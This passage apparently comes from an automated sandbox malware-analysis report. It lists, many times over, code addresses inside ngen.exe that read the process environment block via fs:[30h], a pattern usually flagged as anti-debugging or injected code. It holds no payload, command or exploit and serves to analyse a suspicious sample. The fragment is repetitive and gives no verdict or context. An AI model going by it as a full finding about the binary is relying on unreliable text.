            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05739486 mov eax, dword ptr fs:[00000030h]5_2_05739486
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0580547F mov eax, dword ptr fs:[00000030h]5_2_0580547F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05738770 mov eax, dword ptr fs:[00000030h]5_2_05738770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740770 mov eax, dword ptr fs:[00000030h]5_2_05740770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740770 mov eax, dword ptr fs:[00000030h]5_2_05740770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740770 mov eax, dword ptr fs:[00000030h]5_2_05740770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740770 mov eax, dword ptr fs:[00000030h]5_2_05740770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740770 mov eax, dword ptr fs:[00000030h]5_2_05740770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740770 mov eax, dword ptr fs:[00000030h]5_2_05740770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740770 mov eax, dword ptr fs:[00000030h]5_2_05740770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740770 mov eax, dword ptr fs:[00000030h]5_2_05740770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740770 mov eax, dword ptr fs:[00000030h]5_2_05740770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740770 mov eax, dword ptr fs:[00000030h]5_2_05740770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740770 mov eax, dword ptr fs:[00000030h]5_2_05740770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740770 mov eax, dword ptr fs:[00000030h]5_2_05740770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572B765 mov eax, dword ptr fs:[00000030h]5_2_0572B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572B765 mov eax, dword ptr fs:[00000030h]5_2_0572B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572B765 mov eax, dword ptr fs:[00000030h]5_2_0572B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572B765 mov eax, dword ptr fs:[00000030h]5_2_0572B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05730750 mov eax, dword ptr fs:[00000030h]5_2_05730750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772750 mov eax, dword ptr fs:[00000030h]5_2_05772750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772750 mov eax, dword ptr fs:[00000030h]5_2_05772750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B4755 mov eax, dword ptr fs:[00000030h]5_2_057B4755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05743740 mov eax, dword ptr fs:[00000030h]5_2_05743740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05743740 mov eax, dword ptr fs:[00000030h]5_2_05743740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05743740 mov eax, dword ptr fs:[00000030h]5_2_05743740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_058037B6 mov eax, dword ptr fs:[00000030h]5_2_058037B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576674D mov esi, dword ptr fs:[00000030h]5_2_0576674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576674D mov eax, dword ptr fs:[00000030h]5_2_0576674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576674D mov eax, dword ptr fs:[00000030h]5_2_0576674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05729730 mov eax, dword ptr fs:[00000030h]5_2_05729730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05729730 mov eax, dword ptr fs:[00000030h]5_2_05729730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05765734 mov eax, dword ptr fs:[00000030h]5_2_05765734
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573973A mov eax, dword ptr fs:[00000030h]5_2_0573973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573973A mov eax, dword ptr fs:[00000030h]5_2_0573973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576273C mov eax, dword ptr fs:[00000030h]5_2_0576273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576273C mov ecx, dword ptr fs:[00000030h]5_2_0576273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576273C mov eax, dword ptr fs:[00000030h]5_2_0576273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AC730 mov eax, dword ptr fs:[00000030h]5_2_057AC730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057EF72E mov eax, dword ptr fs:[00000030h]5_2_057EF72E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05733720 mov eax, dword ptr fs:[00000030h]5_2_05733720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574F720 mov eax, dword ptr fs:[00000030h]5_2_0574F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574F720 mov eax, dword ptr fs:[00000030h]5_2_0574F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574F720 mov eax, dword ptr fs:[00000030h]5_2_0574F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F972B mov eax, dword ptr fs:[00000030h]5_2_057F972B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576C720 mov eax, dword ptr fs:[00000030h]5_2_0576C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576C720 mov eax, dword ptr fs:[00000030h]5_2_0576C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05730710 mov eax, dword ptr fs:[00000030h]5_2_05730710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05760710 mov eax, dword ptr fs:[00000030h]5_2_05760710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576F71F mov eax, dword ptr fs:[00000030h]5_2_0576F71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576F71F mov eax, dword ptr fs:[00000030h]5_2_0576F71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05737703 mov eax, dword ptr fs:[00000030h]5_2_05737703
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05735702 mov eax, dword ptr fs:[00000030h]5_2_05735702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05735702 mov eax, dword ptr fs:[00000030h]5_2_05735702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576C700 mov eax, dword ptr fs:[00000030h]5_2_0576C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057347FB mov eax, dword ptr fs:[00000030h]5_2_057347FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057347FB mov eax, dword ptr fs:[00000030h]5_2_057347FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573D7E0 mov ecx, dword ptr fs:[00000030h]5_2_0573D7E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057527ED mov eax, dword ptr fs:[00000030h]5_2_057527ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057527ED mov eax, dword ptr fs:[00000030h]5_2_057527ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057527ED mov eax, dword ptr fs:[00000030h]5_2_057527ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573C7C0 mov eax, dword ptr fs:[00000030h]5_2_0573C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057357C0 mov eax, dword ptr fs:[00000030h]5_2_057357C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057357C0 mov eax, dword ptr fs:[00000030h]5_2_057357C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057357C0 mov eax, dword ptr fs:[00000030h]5_2_057357C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B07C3 mov eax, dword ptr fs:[00000030h]5_2_057B07C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0580B73C mov eax, dword ptr fs:[00000030h]5_2_0580B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0580B73C mov eax, dword ptr fs:[00000030h]5_2_0580B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0580B73C mov eax, dword ptr fs:[00000030h]5_2_0580B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0580B73C mov eax, dword ptr fs:[00000030h]5_2_0580B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575D7B0 mov eax, dword ptr fs:[00000030h]5_2_0575D7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05803749 mov eax, dword ptr fs:[00000030h]5_2_05803749
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B97A9 mov eax, dword ptr fs:[00000030h]5_2_057B97A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057BF7AF mov eax, dword ptr fs:[00000030h]5_2_057BF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057BF7AF mov eax, dword ptr fs:[00000030h]5_2_057BF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057BF7AF mov eax, dword ptr fs:[00000030h]5_2_057BF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057BF7AF mov eax, dword ptr fs:[00000030h]5_2_057BF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057BF7AF mov eax, dword ptr fs:[00000030h]5_2_057BF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057307AF mov eax, dword ptr fs:[00000030h]5_2_057307AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057EF78A mov eax, dword ptr fs:[00000030h]5_2_057EF78A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05762674 mov eax, dword ptr fs:[00000030h]5_2_05762674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F866E mov eax, dword ptr fs:[00000030h]5_2_057F866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F866E mov eax, dword ptr fs:[00000030h]5_2_057F866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576A660 mov eax, dword ptr fs:[00000030h]5_2_0576A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576A660 mov eax, dword ptr fs:[00000030h]5_2_0576A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05769660 mov eax, dword ptr fs:[00000030h]5_2_05769660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05769660 mov eax, dword ptr fs:[00000030h]5_2_05769660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574C640 mov eax, dword ptr fs:[00000030h]5_2_0574C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574E627 mov eax, dword ptr fs:[00000030h]5_2_0574E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05766620 mov eax, dword ptr fs:[00000030h]5_2_05766620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05768620 mov eax, dword ptr fs:[00000030h]5_2_05768620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573262C mov eax, dword ptr fs:[00000030h]5_2_0573262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05733616 mov eax, dword ptr fs:[00000030h]5_2_05733616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05733616 mov eax, dword ptr fs:[00000030h]5_2_05733616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772619 mov eax, dword ptr fs:[00000030h]5_2_05772619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05761607 mov eax, dword ptr fs:[00000030h]5_2_05761607
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE609 mov eax, dword ptr fs:[00000030h]5_2_057AE609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576F603 mov eax, dword ptr fs:[00000030h]5_2_0576F603
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574260B mov eax, dword ptr fs:[00000030h]5_2_0574260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574260B mov eax, dword ptr fs:[00000030h]5_2_0574260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574260B mov eax, dword ptr fs:[00000030h]5_2_0574260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574260B mov eax, dword ptr fs:[00000030h]5_2_0574260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574260B mov eax, dword ptr fs:[00000030h]5_2_0574260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574260B mov eax, dword ptr fs:[00000030h]5_2_0574260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574260B mov eax, dword ptr fs:[00000030h]5_2_0574260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE6F2 mov eax, dword ptr fs:[00000030h]5_2_057AE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE6F2 mov eax, dword ptr fs:[00000030h]5_2_057AE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE6F2 mov eax, dword ptr fs:[00000030h]5_2_057AE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE6F2 mov eax, dword ptr fs:[00000030h]5_2_057AE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B06F1 mov eax, dword ptr fs:[00000030h]5_2_057B06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B06F1 mov eax, dword ptr fs:[00000030h]5_2_057B06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057ED6F0 mov eax, dword ptr fs:[00000030h]5_2_057ED6F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C36EE mov eax, dword ptr fs:[00000030h]5_2_057C36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C36EE mov eax, dword ptr fs:[00000030h]5_2_057C36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C36EE mov eax, dword ptr fs:[00000030h]5_2_057C36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C36EE mov eax, dword ptr fs:[00000030h]5_2_057C36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C36EE mov eax, dword ptr fs:[00000030h]5_2_057C36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C36EE mov eax, dword ptr fs:[00000030h]5_2_057C36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575D6E0 mov eax, dword ptr fs:[00000030h]5_2_0575D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575D6E0 mov eax, dword ptr fs:[00000030h]5_2_0575D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0576A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576A6C7 mov eax, dword ptr fs:[00000030h]5_2_0576A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B6C0 mov eax, dword ptr fs:[00000030h]5_2_0573B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B6C0 mov eax, dword ptr fs:[00000030h]5_2_0573B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B6C0 mov eax, dword ptr fs:[00000030h]5_2_0573B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B6C0 mov eax, dword ptr fs:[00000030h]5_2_0573B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B6C0 mov eax, dword ptr fs:[00000030h]5_2_0573B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B6C0 mov eax, dword ptr fs:[00000030h]5_2_0573B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F16CC mov eax, dword ptr fs:[00000030h]5_2_057F16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F16CC mov eax, dword ptr fs:[00000030h]5_2_057F16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F16CC mov eax, dword ptr fs:[00000030h]5_2_057F16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F16CC mov eax, dword ptr fs:[00000030h]5_2_057F16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05805636 mov eax, dword ptr fs:[00000030h]5_2_05805636
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057EF6C7 mov eax, dword ptr fs:[00000030h]5_2_057EF6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057616CF mov eax, dword ptr fs:[00000030h]5_2_057616CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057276B2 mov eax, dword ptr fs:[00000030h]5_2_057276B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057276B2 mov eax, dword ptr fs:[00000030h]5_2_057276B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057276B2 mov eax, dword ptr fs:[00000030h]5_2_057276B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057666B0 mov eax, dword ptr fs:[00000030h]5_2_057666B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576C6A6 mov eax, dword ptr fs:[00000030h]5_2_0576C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572D6AA mov eax, dword ptr fs:[00000030h]5_2_0572D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572D6AA mov eax, dword ptr fs:[00000030h]5_2_0572D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05734690 mov eax, dword ptr fs:[00000030h]5_2_05734690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05734690 mov eax, dword ptr fs:[00000030h]5_2_05734690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B368C mov eax, dword ptr fs:[00000030h]5_2_057B368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B368C mov eax, dword ptr fs:[00000030h]5_2_057B368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B368C mov eax, dword ptr fs:[00000030h]5_2_057B368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B368C mov eax, dword ptr fs:[00000030h]5_2_057B368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
